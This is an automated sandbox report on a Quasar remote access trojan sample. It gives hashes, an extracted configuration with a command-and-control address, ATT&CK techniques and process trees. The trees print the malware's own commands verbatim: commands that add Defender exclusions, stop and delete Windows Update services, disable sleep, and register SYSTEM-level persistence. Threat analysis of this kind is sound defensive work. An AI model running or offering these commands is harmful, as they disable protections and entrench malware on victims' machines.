quasar | 647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06

Analysis

max time kernel
20s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10/01/2025, 14:10

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

3b1bf937711e0b1f3b6e455d535cc4f0.exe
Size

4.9MB
MD5

3b1bf937711e0b1f3b6e455d535cc4f0
SHA1

c13cd57da269a9c84f63787c87a2e503bb154ac7
SHA256

647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06
SHA512

2805b2e4f3fdce85dea17a355e559073db2bd00e4788d667a3cdf7cde9e77a459545a7494253fe0fc540cbc89c19e599b1616bd7a185cdd4000b01a6354e99f4
SSDEEP

98304:j3GvI7nzlAi52DH1Emy/+hpC7FBV0CCqXqoOONza/IIA2ZeN9zE1m7:j3GvuSiIDHbM+G7Ff0s5NoIIA2M9w1w

Score

10^/10

quasar 4drun discovery evasion execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

4Drun

185.148.3.216:4000

Mutex

c3557859-56ac-475e-b44d-e1b60c20d0d0

Attributes

encryption_key
B000736BEBDF08FC1B6696200651882CF57E43E7
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
3dfx Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023c89-22.dat	family_quasar
behavioral2/memory/3020-31-0x0000000000790000-0x0000000000814000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2096 created 612	2096	powershell.EXE	5

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1068	powershell.exe
1976	powershell.exe
2036	powershell.exe
3480	powershell.exe
3980	powershell.exe
568	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	3b1bf937711e0b1f3b6e455d535cc4f0.exe

Executes dropped EXE 6 IoCs

pid	Process
4424	Tbcelsmfm.exe
4144	lgigivedpdvfs.exe
3020	MLjvrefsd5vf1.exe
2184	Client.exe
4920	kaptsegthwf.exe
4028	Bara.exe

Power Settings 1 TTPs 17 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3492	powercfg.exe
3436	powercfg.exe
908	powercfg.exe
2172	powercfg.exe
1720	powercfg.exe
2924	powercfg.exe
4948	powercfg.exe
792	cmd.exe
3324	cmd.exe
1420	powercfg.exe
1480	powercfg.exe
2172	powercfg.exe
4760	powercfg.exe
756	powercfg.exe
4552	powercfg.exe
2576	powercfg.exe
3484	powercfg.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	Tbcelsmfm.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	kaptsegthwf.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4424 set thread context of 4412	4424	Tbcelsmfm.exe	126
PID 4144 set thread context of 664	4144	lgigivedpdvfs.exe	152
PID 2096 set thread context of 3484	2096	powershell.EXE	169
PID 4920 set thread context of 4604	4920	kaptsegthwf.exe	179
PID 4920 set thread context of 3116	4920	kaptsegthwf.exe	181
PID 4920 set thread context of 1828	4920	kaptsegthwf.exe	185

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Cuis\bon\Bara.exe	lgigivedpdvfs.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	svchost.exe

Launches sc.exe 21 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2384	sc.exe
4036	sc.exe
3576	sc.exe
2260	sc.exe
4944	sc.exe
2440	sc.exe
864	sc.exe
4516	sc.exe
3672	sc.exe
4584	sc.exe
2732	sc.exe
3188	sc.exe
1172	sc.exe
1820	sc.exe
3184	sc.exe
3652	sc.exe
368	sc.exe
3300	sc.exe
2888	sc.exe
2292	sc.exe
3188	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2076	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1976	schtasks.exe
5008	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4424	Tbcelsmfm.exe
2036	powershell.exe
2036	powershell.exe
3480	powershell.exe
3480	powershell.exe
4424	Tbcelsmfm.exe
4424	Tbcelsmfm.exe
4424	Tbcelsmfm.exe
4424	Tbcelsmfm.exe
4424	Tbcelsmfm.exe
4424	Tbcelsmfm.exe
4424	Tbcelsmfm.exe
4424	Tbcelsmfm.exe
4424	Tbcelsmfm.exe
4424	Tbcelsmfm.exe
4424	Tbcelsmfm.exe
4424	Tbcelsmfm.exe
4412	dialer.exe
4412	dialer.exe
1068	powershell.exe
1068	powershell.exe
1068	powershell.exe
4424	Tbcelsmfm.exe
4424	Tbcelsmfm.exe
4424	Tbcelsmfm.exe
4920	kaptsegthwf.exe
3980	powershell.exe
3980	powershell.exe
4416	powershell.exe
4416	powershell.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
2096	powershell.EXE
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
2096	powershell.EXE
4412	dialer.exe
4412	dialer.exe
3980	powershell.exe
4468	powershell.EXE
4412	dialer.exe
4412	dialer.exe
4920	kaptsegthwf.exe
4920	kaptsegthwf.exe
4412	dialer.exe
4412	dialer.exe
4412	dialer.exe
2096	powershell.EXE
4920	kaptsegthwf.exe
4468	powershell.EXE
4412	dialer.exe
4412	dialer.exe
4920	kaptsegthwf.exe
2096	powershell.EXE
2096	powershell.EXE
3484	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3020	MLjvrefsd5vf1.exe
Token: SeDebugPrivilege	2184	Client.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	3480	powershell.exe
Token: SeShutdownPrivilege	1420	powercfg.exe
Token: SeCreatePagefilePrivilege	1420	powercfg.exe
Token: SeDebugPrivilege	4424	Tbcelsmfm.exe
Token: SeShutdownPrivilege	4552	powercfg.exe
Token: SeCreatePagefilePrivilege	4552	powercfg.exe
Token: SeDebugPrivilege	4412	dialer.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeShutdownPrivilege	4948	powercfg.exe
Token: SeCreatePagefilePrivilege	4948	powercfg.exe
Token: SeShutdownPrivilege	1480	powercfg.exe
Token: SeCreatePagefilePrivilege	1480	powercfg.exe
Token: SeShutdownPrivilege	2576	powercfg.exe
Token: SeCreatePagefilePrivilege	2576	powercfg.exe
Token: SeShutdownPrivilege	2924	powercfg.exe
Token: SeCreatePagefilePrivilege	2924	powercfg.exe
Token: SeShutdownPrivilege	3492	powercfg.exe
Token: SeCreatePagefilePrivilege	3492	powercfg.exe
Token: SeShutdownPrivilege	3484	powercfg.exe
Token: SeCreatePagefilePrivilege	3484	powercfg.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeIncreaseQuotaPrivilege	1068	powershell.exe
Token: SeSecurityPrivilege	1068	powershell.exe
Token: SeTakeOwnershipPrivilege	1068	powershell.exe
Token: SeLoadDriverPrivilege	1068	powershell.exe
Token: SeSystemProfilePrivilege	1068	powershell.exe
Token: SeSystemtimePrivilege	1068	powershell.exe
Token: SeProfSingleProcessPrivilege	1068	powershell.exe
Token: SeIncBasePriorityPrivilege	1068	powershell.exe
Token: SeCreatePagefilePrivilege	1068	powershell.exe
Token: SeBackupPrivilege	1068	powershell.exe
Token: SeRestorePrivilege	1068	powershell.exe
Token: SeShutdownPrivilege	1068	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeSystemEnvironmentPrivilege	1068	powershell.exe
Token: SeRemoteShutdownPrivilege	1068	powershell.exe
Token: SeUndockPrivilege	1068	powershell.exe
Token: SeManageVolumePrivilege	1068	powershell.exe
Token: 33	1068	powershell.exe
Token: 34	1068	powershell.exe
Token: 35	1068	powershell.exe
Token: 36	1068	powershell.exe
Token: SeIncreaseQuotaPrivilege	1068	powershell.exe
Token: SeSecurityPrivilege	1068	powershell.exe
Token: SeTakeOwnershipPrivilege	1068	powershell.exe
Token: SeLoadDriverPrivilege	1068	powershell.exe
Token: SeSystemProfilePrivilege	1068	powershell.exe
Token: SeSystemtimePrivilege	1068	powershell.exe
Token: SeProfSingleProcessPrivilege	1068	powershell.exe
Token: SeIncBasePriorityPrivilege	1068	powershell.exe
Token: SeCreatePagefilePrivilege	1068	powershell.exe
Token: SeBackupPrivilege	1068	powershell.exe
Token: SeRestorePrivilege	1068	powershell.exe
Token: SeShutdownPrivilege	1068	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeSystemEnvironmentPrivilege	1068	powershell.exe
Token: SeRemoteShutdownPrivilege	1068	powershell.exe
Token: SeUndockPrivilege	1068	powershell.exe
Token: SeManageVolumePrivilege	1068	powershell.exe
Token: 33	1068	powershell.exe
Token: 34	1068	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4144	lgigivedpdvfs.exe
2184	Client.exe
640	Conhost.exe
1540	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3224 wrote to memory of 4424	3224	3b1bf937711e0b1f3b6e455d535cc4f0.exe	82
PID 3224 wrote to memory of 4424	3224	3b1bf937711e0b1f3b6e455d535cc4f0.exe	82
PID 3224 wrote to memory of 4144	3224	3b1bf937711e0b1f3b6e455d535cc4f0.exe	84
PID 3224 wrote to memory of 4144	3224	3b1bf937711e0b1f3b6e455d535cc4f0.exe	84
PID 3224 wrote to memory of 3020	3224	3b1bf937711e0b1f3b6e455d535cc4f0.exe	85
PID 3224 wrote to memory of 3020	3224	3b1bf937711e0b1f3b6e455d535cc4f0.exe	85
PID 3020 wrote to memory of 1976	3020	MLjvrefsd5vf1.exe	86
PID 3020 wrote to memory of 1976	3020	MLjvrefsd5vf1.exe	86
PID 3020 wrote to memory of 2184	3020	MLjvrefsd5vf1.exe	88
PID 3020 wrote to memory of 2184	3020	MLjvrefsd5vf1.exe	88
PID 2184 wrote to memory of 5008	2184	Client.exe	89
PID 2184 wrote to memory of 5008	2184	Client.exe	89
PID 4144 wrote to memory of 3480	4144	lgigivedpdvfs.exe	97
PID 4144 wrote to memory of 3480	4144	lgigivedpdvfs.exe	97
PID 2456 wrote to memory of 3180	2456	cmd.exe	105
PID 2456 wrote to memory of 3180	2456	cmd.exe	105
PID 4144 wrote to memory of 3864	4144	lgigivedpdvfs.exe	110
PID 4144 wrote to memory of 3864	4144	lgigivedpdvfs.exe	110
PID 4144 wrote to memory of 3324	4144	lgigivedpdvfs.exe	111
PID 4144 wrote to memory of 3324	4144	lgigivedpdvfs.exe	111
PID 4144 wrote to memory of 1068	4144	lgigivedpdvfs.exe	114
PID 4144 wrote to memory of 1068	4144	lgigivedpdvfs.exe	114
PID 3864 wrote to memory of 1172	3864	cmd.exe	117
PID 3864 wrote to memory of 1172	3864	cmd.exe	117
PID 3324 wrote to memory of 1420	3324	cmd.exe	119
PID 3324 wrote to memory of 1420	3324	cmd.exe	119
PID 3864 wrote to memory of 3672	3864	cmd.exe	120
PID 3864 wrote to memory of 3672	3864	cmd.exe	120
PID 3324 wrote to memory of 4552	3324	cmd.exe	121
PID 3324 wrote to memory of 4552	3324	cmd.exe	121
PID 4424 wrote to memory of 4412	4424	Tbcelsmfm.exe	126
PID 4424 wrote to memory of 4412	4424	Tbcelsmfm.exe	126
PID 4424 wrote to memory of 4412	4424	Tbcelsmfm.exe	126
PID 4424 wrote to memory of 4412	4424	Tbcelsmfm.exe	126
PID 4424 wrote to memory of 4412	4424	Tbcelsmfm.exe	126
PID 4424 wrote to memory of 4412	4424	Tbcelsmfm.exe	126
PID 4424 wrote to memory of 4412	4424	Tbcelsmfm.exe	126
PID 3324 wrote to memory of 3492	3324	cmd.exe	133
PID 3324 wrote to memory of 3492	3324	cmd.exe	133
PID 3864 wrote to memory of 1820	3864	cmd.exe	134
PID 3864 wrote to memory of 1820	3864	cmd.exe	134
PID 3324 wrote to memory of 3484	3324	cmd.exe	169
PID 3324 wrote to memory of 3484	3324	cmd.exe	169
PID 3864 wrote to memory of 3184	3864	cmd.exe	138
PID 3864 wrote to memory of 3184	3864	cmd.exe	138
PID 3864 wrote to memory of 2888	3864	cmd.exe	145
PID 3864 wrote to memory of 2888	3864	cmd.exe	145
PID 3864 wrote to memory of 3616	3864	cmd.exe	147
PID 3864 wrote to memory of 3616	3864	cmd.exe	147
PID 3864 wrote to memory of 4620	3864	cmd.exe	148
PID 3864 wrote to memory of 4620	3864	cmd.exe	148
PID 3864 wrote to memory of 4864	3864	cmd.exe	166
PID 3864 wrote to memory of 4864	3864	cmd.exe	166
PID 3864 wrote to memory of 2664	3864	cmd.exe	150
PID 3864 wrote to memory of 2664	3864	cmd.exe	150
PID 3864 wrote to memory of 4860	3864	cmd.exe	151
PID 3864 wrote to memory of 4860	3864	cmd.exe	151
PID 4144 wrote to memory of 664	4144	lgigivedpdvfs.exe	152
PID 4144 wrote to memory of 664	4144	lgigivedpdvfs.exe	152
PID 4144 wrote to memory of 664	4144	lgigivedpdvfs.exe	152
PID 4144 wrote to memory of 4416	4144	lgigivedpdvfs.exe	153
PID 4144 wrote to memory of 4416	4144	lgigivedpdvfs.exe	153
PID 4416 wrote to memory of 4520	4416	powershell.exe	155
PID 4416 wrote to memory of 4520	4416	powershell.exe	155

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1020
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{40ccbadd-7286-4c16-9fbe-2c61fac42258}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3484
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{3ff98c24-a27b-4b12-aeba-40c080cff0ed}
  2⤵
  PID:856

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1112

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in Windows directory
PID:1228
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2800
- C:\Program Files\Cuis\bon\Bara.exe
  "C:\Program Files\Cuis\bon\Bara.exe"
  2⤵
  - Executes dropped EXE
  PID:4028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:568
- - C:\Windows\system32\cmd.exe
    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:2512
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:3188
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:2440
- - C:\Windows\system32\cmd.exe
    cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:792
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:2172
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:756
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:1720
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1976
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe ujznpffbjbh
    3⤵
    PID:2760
  - - C:\Windows\system32\cmd.exe
      cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      4⤵
      PID:3912
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    3⤵
    PID:1680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController GET Name, VideoProcessor
      4⤵
      Detects videocard installed
      PID:2076
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
